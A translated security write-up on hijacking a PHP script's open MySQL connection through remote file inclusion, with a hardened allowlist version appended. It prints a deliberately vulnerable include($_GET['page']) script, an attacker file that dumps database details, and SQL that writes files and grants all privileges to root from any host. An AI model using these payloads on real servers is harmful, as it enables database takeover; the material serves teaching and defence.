This is caused by how the mysql_close function behaves.
Quote:
mysql_close() closes the non-persistent connection to the MySQL server that’s associated with the specified link identifier. If link_identifier isn’t specified, the last opened link is used.
Using mysql_close() isn’t usually necessary, as non-persistent open links are automatically closed at the end of the script’s execution. See also freeing resources.
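That is, mysql_close() is usually not needed, because open non-persistent connections are closed automatically once the script finishes executing.
A test: mysql.php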
<?php
$host = "localhost";
$user = "root";
$pass = "rootpass";
$db = "test";
// Current connection: opened here and never closed explicitly
$connect = mysql_connect($host,$user,$pass);
mysql_select_db($db,$connect);
$query = mysql_query("SELECT uname FROM admin");
while($lol = mysql_fetch_array($query)){
echo "we get it: ".$lol["uname"]."<br>";
}
include($_GET["page"]); // this script has an RFI flaw
?>
Local file:
<?php
$evil = mysql_query("SELECT concat_ws(0x3a,database(),version(),user());");
$a = mysql_fetch_array($evil);
echo $a[0];
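?>
When we submit the URL, we find that the local code is executed by the remote host. The included file never calls mysql_connect(); mysql_query() without a link identifier uses the last opened link, which is the connection mysql.php left open.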
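When writing code, programmers like to keep the database connection in a separate file and include it wherever another file needs it, for example include("dbtabase.php");
If a penetration test turns up a PHP include in a script that has also included the database connection, we can operate on its database, and perhaps do other things as well, for example:
SELECT 'Hello World' INTO DUMPFILE '/tmp/test.txt'
or:
GRANT ALL PRIVILEGES ON *.* TO 'root'@'%' IDENTIFIED BY 'pass' WITH GRANT OPTION;
Of course, simply including a webshell is a lot more fun.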
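The hardened counterpart of mysql.php, as an added example that is not part of the original post: the include target comes from a fixed allowlist, and the connection lives inside a function and is closed before any include runs. It assumes PHP 7.1+ with mysqli; the page names and file paths are hypothetical, and the credentials are the post's test values.

```php
<?php
// Added example, not the post's code. Page names and paths are hypothetical.
// Allowlist: ?page= values map to fixed local files, never to user input.
const PAGES = [
    'home'  => __DIR__ . '/pages/home.php',
    'about' => __DIR__ . '/pages/about.php',
];

// Return the file for an allowlisted page name, or null for anything else.
function resolve_page($name): ?string
{
    if (!is_string($name) || !array_key_exists($name, PAGES)) {
        return null; // also rejects ?page[]=... (array input)
    }
    return PAGES[$name];
}

// The connection handle stays local to this function, so an included file
// cannot reach it, and it is closed explicitly instead of at script end.
function admin_names(): array
{
    mysqli_report(MYSQLI_REPORT_ERROR | MYSQLI_REPORT_STRICT);
    $db = new mysqli('localhost', 'root', 'rootpass', 'test');
    try {
        $names = [];
        $result = $db->query('SELECT uname FROM admin');
        while ($row = $result->fetch_assoc()) {
            $names[] = $row['uname'];
        }
        return $names;
    } finally {
        $db->close(); // no open link is left for later code to reuse
    }
}

foreach (admin_names() as $uname) {
    echo 'we get it: ' . htmlspecialchars($uname, ENT_QUOTES, 'UTF-8') . '<br>';
}

$file = resolve_page($_GET['page'] ?? null);
if ($file === null) {
    http_response_code(404);
    exit;
}
include $file; // only fixed local paths from PAGES reach include
```

Keeping allow_url_include = Off in php.ini blocks remote URLs in include, but a local file inclusion would still run alongside any connection left open, which is why the allowlist and the explicit close are both needed.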
Reference:
MySQL Session Hijacking over RFI